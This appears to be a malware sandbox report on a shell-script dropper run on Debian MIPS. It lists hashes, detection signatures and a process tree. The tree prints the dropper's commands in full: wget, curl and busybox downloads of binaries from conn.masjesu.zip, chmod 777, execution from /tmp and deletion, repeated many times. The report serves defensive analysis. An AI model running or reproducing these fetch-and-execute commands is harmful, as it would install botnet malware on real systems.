Analysis
-
max time kernel
79s -
max time network
107s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 04:04
Static task
static1
Behavioral task
behavioral1
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
-
Size
10KB
-
MD5
b5f00b34167fe96b81dc9665e6270fa1
-
SHA1
85c7e0bcb2347c19116b2c25edec820fb146b6d0
-
SHA256
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b
-
SHA512
7b946d54011a2a0dab5d02d954062d55468a624a8efa18baba4d31e0c99bfba3592a845cf51555e4ffa0078bcb1aa5f3aa7bacd25f492cfdc17793d6c6c0bdbf
-
SSDEEP
192:SBfFdewQdKWQGeqVwYjPmOhkwkpzmOhkwEfAwQdKW6aeqVwYU:SBfFdewQdKWzPmOhkwkpzmOhkwEfAwQO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 915 chmod 967 chmod 892 chmod 900 chmod 922 chmod 1026 chmod 857 chmod 975 chmod 754 chmod 1011 chmod 990 chmod 829 chmod 879 chmod 930 chmod 937 chmod 945 chmod 952 chmod 959 chmod 745 chmod 821 chmod 907 chmod 997 chmod 839 chmod 792 chmod 982 chmod 1004 chmod 1018 chmod 767 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc 746 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i 755 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X 768 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK 793 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m 822 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb 830 200cUyejdGjWDM9heC9D1Qq26iolWznBRb /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 840 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX 859 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA 880 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz 893 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp 901 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz 908 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 916 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd 923 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp 931 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz 938 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 946 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd 953 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc 960 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i 968 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X 976 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK 983 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m 991 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb 998 200cUyejdGjWDM9heC9D1Qq26iolWznBRb /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 1005 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX 1012 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA 1019 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz 1027 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 912 curl 918 wget 742 busybox 751 curl 758 curl 763 busybox 825 wget 896 wget 1015 curl 1023 curl 933 wget 949 curl 951 busybox 1000 wget 1003 busybox 1010 busybox 773 wget 828 busybox 838 busybox 921 busybox 978 wget 863 wget 956 curl 993 wget 1014 wget 866 curl 843 wget 963 wget 753 busybox 797 wget 826 curl 833 curl 966 busybox 979 curl 749 wget 757 wget 815 busybox 927 curl 934 curl 972 curl 852 busybox 899 busybox 1007 wget 986 wget 1017 busybox 723 wget 804 curl 948 wget 955 wget 971 wget 974 busybox 944 busybox 788 busybox 832 wget 875 busybox 885 wget 889 curl 906 busybox 903 wget 911 wget 926 wget 987 curl 1025 busybox 996 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc curl File opened for modification /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 curl File opened for modification /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m curl File opened for modification /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m curl File opened for modification /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX curl File opened for modification /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz curl File opened for modification /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd curl File opened for modification /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz curl File opened for modification /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK curl File opened for modification /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz curl File opened for modification /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK curl File opened for modification /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb curl File opened for modification /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 curl File opened for modification /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd curl File opened for modification /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i curl File opened for modification /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb curl File opened for modification /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 curl File opened for modification /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA curl File opened for modification /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA curl File opened for modification /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp curl File opened for modification /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz curl File opened for modification /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp curl File opened for modification /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 curl File opened for modification /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc curl File opened for modification /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X curl File opened for modification /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX curl File opened for modification /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i curl File opened for modification /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X curl
Processes
-
/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:723
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:753
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:757
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:771
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:773
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:796
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:891
-
-
/bin/chmodchmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:914
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:929
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:936
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:958
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:959
-
-
